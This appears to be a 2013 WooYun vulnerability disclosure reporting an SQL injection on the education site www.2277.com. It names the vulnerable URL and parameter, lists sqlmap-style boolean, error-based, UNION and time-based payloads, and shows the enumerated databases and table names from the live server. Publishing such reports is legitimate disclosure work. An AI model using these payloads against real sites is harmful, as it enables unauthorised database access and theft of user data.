漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:2277.com主站SQL注入漏洞
提交时间:2013-07-25 23:33
修复时间:2013-09-08 23:34
公开时间:2013-09-08 23:34
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
无
漏洞详情 披露状态:
2013-07-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2013-09-08: 厂商已经主动忽略漏洞,细节向公众公开
简要描述: www.2277.com 主站SQL注入漏洞,整站数据泄露
详细说明: 注入点:
http://www.2277.com/index.php?r=search/course&k=123
注入参数:k --- Place: GET Parameter: k Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: r=search/course&k=123' AND 8835=8835# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: r=search/course&k=123' AND (SELECT 5293 FROM(SELECT COUNT(*),CONCAT (0x7168746571,(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE 0 END)),0x716e797171,FL OOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QONP' ='QONP Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: r=search/course&k=-1912' UNION ALL SELECT CONCAT(0x7168746571,0x595 87a694d7a48595554,0x716e797171),NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: r=search/course&k=123' AND SLEEP(5) AND 'wMJu'='wMJu ---
漏洞证明:
[INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0 available databases [9]: [*] 2277_bbs [*] bbs_v2 [*] bill [*] edu_db [*] f2f [*] information_schema [*] mysql [*] performance_schema [*] test
Database: f2f [124 tables] +------------------------------------+ | tb_check_list | | tb_comments | | tb_common_sequence | | tb_course | | tb_course_category | | tb_course_category_course | | tb_course_lesson_evaluate | | tb_course_lesson_pay | | tb_course_lesson_present | | tb_course_lesson_screenshot | | tb_course_period | | tb_course_schedule | | tb_courseware | | tb_courseware_download | | tb_courseware_reference | | tb_deploy_classroom | | tb_deploy_course_service | | tb_deploy_course_status | | tb_deploy_host | | tb_deploy_host_ip | | tb_deploy_online_log | | tb_deploy_service | | tb_deploy_service_type | | tb_deploy_telecom | | tb_group_buy | | tb_group_buy_order | | tb_order | | tb_order_course | | tb_order_course_evaluate | | tb_pay_channel | | tb_pay_currency | | tb_pay_income_log | | tb_pay_recharge | | tb_pay_withdrawl | | tb_permission_item | | tb_permission_role | | tb_permission_role_permission | | tb_permission_user_role | | tb_refund_order | | tb_refund_process | | tb_refund_reason | | tb_school | | tb_school_category | | tb_school_category_course | | tb_school_category_school | | tb_school_contract | | tb_school_course_category | | tb_school_evaluate | | tb_school_member | | tb_school_member_permission | | tb_school_permission_info | | tb_school_permission_item | | tb_school_permission_item_category | | tb_setting_bank | | tb_setting_city | | tb_setting_country | | tb_setting_province | | tb_user_bank | | tb_user_blacklist | | tb_user_edu | | tb_user_email_verify | | tb_user_evaluate | | tb_user_favorite | | tb_user_favorite_category | | tb_user_finger_email | | tb_user_finger_mobilephone | | tb_user_finger_username | | tb_user_info | | tb_user_loginlog | | tb_user_register | | tb_user_secure_question | | tb_user_visit | | tb_web_active_vote | | tb_web_activity | | tb_web_activity_application | | tb_web_article | | tb_web_article_activity | | tb_web_article_type | | tb_web_auth_module | | tb_web_auth_module_operate | | tb_web_auth_operate | | tb_web_auth_role | | tb_web_banner | | tb_web_banner_datasource | | tb_web_banner_log | | tb_web_category | | tb_web_category_info | | tb_web_elite_type | | tb_web_exinfo | | tb_web_index_module | | tb_web_index_module_type | | tb_web_keyword | | tb_web_log | | tb_web_message | | tb_web_message_receiver | | tb_web_newbanner | | tb_web_newbanner_type | | tb_web_params | | tb_web_real_identification | | tb_web_student_taste | | tb_web_tuan_course | | tb_web_video_course | | tb_web_video_course_active | | tb_web_violation | | v_analyse_evaluate_condition | | v_deploy_classroom | | v_deploy_classroom_all | | v_deploy_service_host_ip | | v_deploy_service_ip | | v_evaluate_course | | v_evaluate_learner | | v_evaluate_period | | v_evaluate_school | | v_evaluate_teacher | | v_good_evaluate_course | | v_good_evaluate_learner | | v_good_evaluate_period | | v_good_evaluate_school | | v_good_evaluate_teacher | | v_learners_course | | v_learners_course_period | | v_learners_lesson | | v_learners_lesson_time | | v_query_pendpay_info | +------------------------------------+
修复方案: 版权声明:转载请注明来源 c2c2 @乌云
漏洞回应